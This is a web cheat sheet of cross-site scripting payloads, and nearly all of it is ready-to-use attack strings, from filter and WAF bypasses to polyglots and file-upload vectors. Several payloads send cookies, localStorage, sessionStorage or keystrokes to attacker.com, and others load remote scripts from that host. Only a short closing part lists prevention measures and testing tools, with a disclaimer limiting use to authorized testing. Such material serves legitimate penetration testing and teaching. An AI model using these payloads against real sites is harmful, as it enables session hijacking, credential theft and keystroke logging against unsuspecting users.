Skip to content

XSS (Cross-Site Scripting) Payloads

Cross-Site Scripting (XSS) is a web security vulnerability that allows attackers to inject malicious scripts into web pages viewed by other users. This cheatsheet covers comprehensive XSS payloads, attack vectors, and bypass techniques.

Types of XSS Attacks

Reflected XSS (Non-Persistent)

Malicious script is reflected off a web server (e.g., in error messages, search results) and executed immediately.

Example Scenario:

http://example.com/search?q=<script>alert('XSS')</script>

Stored XSS (Persistent)

Malicious script is permanently stored on the target server (database, message board, comment field) and executed when users view the infected page.

Example: Injecting into a comment section that displays to all users.

DOM-Based XSS

Attack occurs entirely client-side by manipulating the DOM environment. The malicious payload never reaches the server.

Example: JavaScript reads from window.location.hash and writes to innerHTML without sanitization.


Basic Payloads

Simple Alert Boxes

<script>alert(1)</script>
<script>alert('XSS')</script>
<script>alert(document.domain)</script>
<script>prompt(1)</script>
<script>confirm(1)</script>

Script Tag Variations

<SCRIPT>alert('XSS')</SCRIPT>
<script>alert(String.fromCharCode(88,83,83))</script>
<script src="http://malicious.com/xss.js"></script>
<script src=//attacker.com/xss.js></script>

No Quotes

<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>

Using Backticks

<script>alert`1`</script>
<script>eval(`alert\x281\x29`)</script>

Event Handler Payloads

Event handlers execute JavaScript when specific events occur, useful when <script> tags are blocked.

Image Tag Events

<img src=x onerror=alert(1)>
<img src=x onerror="alert('XSS')">
<img src=x onerror=alert(String.fromCharCode(88,83,83))>
<img src=javascript:alert('XSS')>
<img dynsrc=javascript:alert('XSS')>
<img lowsrc=javascript:alert('XSS')>

Body Events

<body onload=alert(1)>
<body onpageshow=alert(1)>
<body onfocus=alert(1)>
<body onhashchange=alert(1)>

Input Events

<input onfocus=alert(1) autofocus>
<input onblur=alert(1) autofocus><input autofocus>
<input type="text" value="x" oninput="alert(1)">
<input type="text" value="x" onchange="alert(1)">
<input type="submit" value="Click" onclick="alert(1)">

Mouse Events

<div onmouseover=alert(1)>Hover me</div>
<div onmouseout=alert(1)>Move away</div>
<div onclick=alert(1)>Click me</div>
<div ondblclick=alert(1)>Double click</div>
<a href="javascript:alert(1)">Click</a>
<a href="javascript:alert`1`">Click</a>
<a href="data:text/html,<script>alert(1)</script>">Click</a>
<a href="#" onclick="alert(1)">Click</a>

Other Event Handlers

<details ontoggle=alert(1)>
<marquee onstart=alert(1)>
<video src=x onerror=alert(1)>
<audio src=x onerror=alert(1)>
<select onfocus=alert(1) autofocus>
<textarea onfocus=alert(1) autofocus>
<keygen onfocus=alert(1) autofocus>
<form><button formaction=javascript:alert(1)>Click</button></form>

HTML5 & SVG Payloads

SVG Based XSS

<svg onload=alert(1)>
<svg><script>alert(1)</script></svg>
<svg><animate onbegin=alert(1) attributeName=x dur=1s>
<svg><set onbegin=alert(1) attributeName=x to=0>
<svg><animatetransform onbegin=alert(1) attributeName=transform>
<svg><foreignObject><body onload=alert(1)></body></foreignObject></svg>

Iframe Payloads

<iframe src=javascript:alert(1)>
<iframe src="data:text/html,<script>alert(1)</script>">
<iframe srcdoc="<script>alert(1)</script>">
<iframe onload=alert(1)>

Object & Embed Tags

<object data="javascript:alert(1)">
<object data="data:text/html,<script>alert(1)</script>">
<embed src="javascript:alert(1)">
<embed src="data:text/html,<script>alert(1)</script>">

HTML5 Specific

<video><source onerror="alert(1)">
<audio><source onerror="alert(1)">
<canvas width="1000" height="1000" style="width:100%;height:100%" onload="alert(1)">
<isindex type=image src=x onerror=alert(1)>
<form><button formaction=javascript:alert(1)>XSS</button></form>

DOM-Based XSS

Location-Based Injection

// Vulnerable code:
document.write(window.location.hash.substring(1));

// Exploit:
http://example.com/page.html#<script>alert(1)</script>

innerHTML Injection

// Vulnerable code:
document.getElementById('output').innerHTML = userInput;

// Exploit:
<img src=x onerror=alert(1)>

eval() Exploitation

// Vulnerable code:
eval(window.location.hash.substring(1));

// Exploit:
http://example.com/page.html#alert(1)

document.write()

// Vulnerable code:
document.write("<h1>" + location.search + "</h1>");

// Exploit:
?search=</h1><script>alert(1)</script>

Encoding & Obfuscation

HTML Entity Encoding

&lt;script&gt;alert(1)&lt;/script&gt;
&#60;script&#62;alert(1)&#60;/script&#62;
&#x3C;script&#x3E;alert(1)&#x3C;/script&#x3E;
<img src=x onerror="alert&#40;1&#41;">

URL Encoding

%3Cscript%3Ealert(1)%3C/script%3E
<img src=x onerror=alert%281%29>
%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E

Double URL Encoding

%253Cscript%253Ealert(1)%253C/script%253E
%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E

Unicode Encoding

\u003cscript\u003ealert(1)\u003c/script\u003e
<script>\u0061lert(1)</script>
<script>eval('\u0061lert(1)')</script>

Hex Encoding

<script>eval('\x61\x6c\x65\x72\x74\x28\x31\x29')</script>
<img src=x onerror=eval('\x61\x6c\x65\x72\x74\x28\x31\x29')>

Base64 Encoding

<script>eval(atob('YWxlcnQoMSk='))</script>
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">

Character Code Obfuscation

<script>alert(String.fromCharCode(88,83,83))</script>
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>

String Concatenation

<script>eval('ale'+'rt(1)')</script>
<script>eval('al'+'er'+'t(1)')</script>
<script>window['ale'+'rt'](1)</script>

WAF Bypass Techniques

Case Manipulation

<ScRiPt>alert(1)</sCrIpT>
<IMG SRC=x ONERROR=alert(1)>
<SvG OnLoAd=alert(1)>

Comment Breaking

<script><!---->alert(1)</script>
<script>/**/alert(1)</script>
<img src=x onerror=/**/alert(1)/**/>

Newline & Tab Injection

<script>
alert(1)
</script>

<img    src=x   onerror=alert(1)>
<svg
onload=alert(1)>

Null Byte Injection

<script>al%00ert(1)</script>
<img src=x onerror=al%00ert(1)>

Alternative Tags & Attributes

<details open ontoggle=alert(1)>
<marquee onstart=alert(1)>XSS</marquee>
<isindex type=image src=x onerror=alert(1)>
<embed src=javascript:alert(1)>

Using Different Protocols

<a href="javascript:alert(1)">Click</a>
<a href="data:text/html,<script>alert(1)</script>">Click</a>
<a href="vbscript:msgbox(1)">Click</a>

Header Injection

If input is reflected in HTTP headers:

User-Agent: <script>alert(1)</script>
Referer: javascript:alert(1)
X-Forwarded-For: <svg onload=alert(1)>

JSON Format Bypass

{"name":"<img src=x onerror=alert(1)>"}
{"comment":"</script><script>alert(1)</script>"}

Parameter Pollution

?param=harmless&param=<script>alert(1)</script>

<script>document.location='http://attacker.com/?c='+document.cookie</script>
<script>new Image().src='http://attacker.com/?c='+document.cookie</script>
<img src=x onerror=this.src='http://attacker.com/?c='+document.cookie>

Using Fetch API

<script>
fetch('http://attacker.com/?c='+document.cookie, {mode: 'no-cors'})
</script>

Using XMLHttpRequest

<script>
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://attacker.com/?c='+document.cookie, true);
xhr.send();
</script>

Session Hijacking

<script>
fetch('http://attacker.com/steal', {
  method: 'POST',
  body: JSON.stringify({
    cookie: document.cookie,
    localStorage: JSON.stringify(localStorage),
    sessionStorage: JSON.stringify(sessionStorage)
  }),
  mode: 'no-cors'
});
</script>

Keylogger Injection

<script>
document.onkeypress = function(e) {
  fetch('http://attacker.com/log?key='+e.key);
}
</script>

Polyglot Payloads

Polyglot payloads work in multiple contexts (HTML, JavaScript, etc.).

javascript:/*--></title></style></textarea></script></xmp>
<svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)
><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script>
<script>alert(document.cookie)</script>">
<img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id)>

"><img src=x onerror=prompt(1)>

Advanced Techniques

CSS Injection for XSS

<style>
body[onload*="alert(1)"] {}
</style>
<body onload="alert(1)">

Template Injection

Angular JS:

{{constructor.constructor('alert(1)')()}}
{{$on.constructor('alert(1)')()}}

Vue.js:

{{constructor.constructor('alert(1)')()}}

Mutation XSS (mXSS)

Exploiting HTML parsers and sanitizers:

<noscript><p title="</noscript><img src=x onerror=alert(1)>">

Length Limitation Bypass

When character limits exist:

<script src=//⑮.₨></script>
<svg onload=alert(1)>

Filter Bypass with Alternative Functions

Instead of alert():

<script>confirm(1)</script>
<script>prompt(1)</script>
<script>console.log(1)</script>
<script>throw 1</script>
<script>debugger</script>
<script>eval('al'+'ert(1)')</script>
<script>setTimeout('alert(1)',0)</script>
<script>setInterval('alert(1)',0)</script>
<script>Function('alert(1)')()</script>

Bypassing Parentheses Filter

<script>onerror=alert;throw 1</script>
<script>throw onerror=eval,'=alert\x281\x29'</script>
<script>{onerror=alert}throw 1</script>
<script>eval`alert\x281\x29`</script>

Bypassing Dot (.) Filter

<script>window['alert'](1)</script>
<script>window[/alert/.source](1)</script>
<script>top['al'+'ert'](1)</script>

File Upload XSS

SVG file upload:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(document.domain);
  </script>
</svg>

PDF file:

%PDF-1.4
1 0 obj
<</Type/Catalog/Pages 2 0 R>>
endobj
2 0 obj
<</Type/Pages/Count 1/Kids[3 0 R]>>
endobj
3 0 obj
<</Type/Page/Parent 2 0 R/MediaBox[0 0 612 792]/Contents 4 0 R>>
endobj
4 0 obj
<</Length 44>>
stream
BT /F1 12 Tf 100 700 Td (XSS Test) Tj ET
endstream
endobj
xref
0 5
trailer
<</Size 5/Root 1 0 R>>
startxref
%%EOF
/AA <<
/O <</S/JavaScript/JS(app.alert("XSS");)>>
>>

Content-Type Bypass

Content-Type: text/html; charset=UTF-7

+ADw-script+AD4-alert(1)+ADw-/script+AD4-

Remote Script Inclusion

<script src="//attacker.com/xss.js"></script>
<script src="\\attacker.com\xss.js"></script>
<script src="http://attacker.com/xss.js"></script>
<script src="https://attacker.com/xss.js"></script>

Breaking Out of JavaScript Context

If input is inside JavaScript:

// Vulnerable code:
var user = 'USER_INPUT';

// Payload:
'; alert(1); //
'; alert(1); var foo='
</script><script>alert(1)</script>

Prevention Best Practices

  1. Input Validation: Validate all user input on server-side
  2. Output Encoding: Encode data before rendering in HTML context
  3. Content Security Policy (CSP): Implement strict CSP headers
  4. HTTPOnly Cookies: Prevent JavaScript access to cookies
  5. X-XSS-Protection Header: Enable browser XSS filters
  6. Use Security Libraries: Utilize frameworks with built-in XSS protection
  7. Regular Security Audits: Perform code reviews and penetration testing

Testing Tools

  • Burp Suite - Web application security testing
  • OWASP ZAP - Vulnerability scanner
  • XSStrike - Advanced XSS detection suite
  • XSSer - Automated XSS testing framework
  • DalFox - Fast parameter analysis and XSS scanning
  • Nuclei - Template-based vulnerability scanner
  • PortSwigger XSS Cheat Sheet - Comprehensive XSS vector database

⚠️ Warning: These payloads are for educational and authorized security testing purposes only. Unauthorized use against systems you don't own or have explicit permission to test is illegal.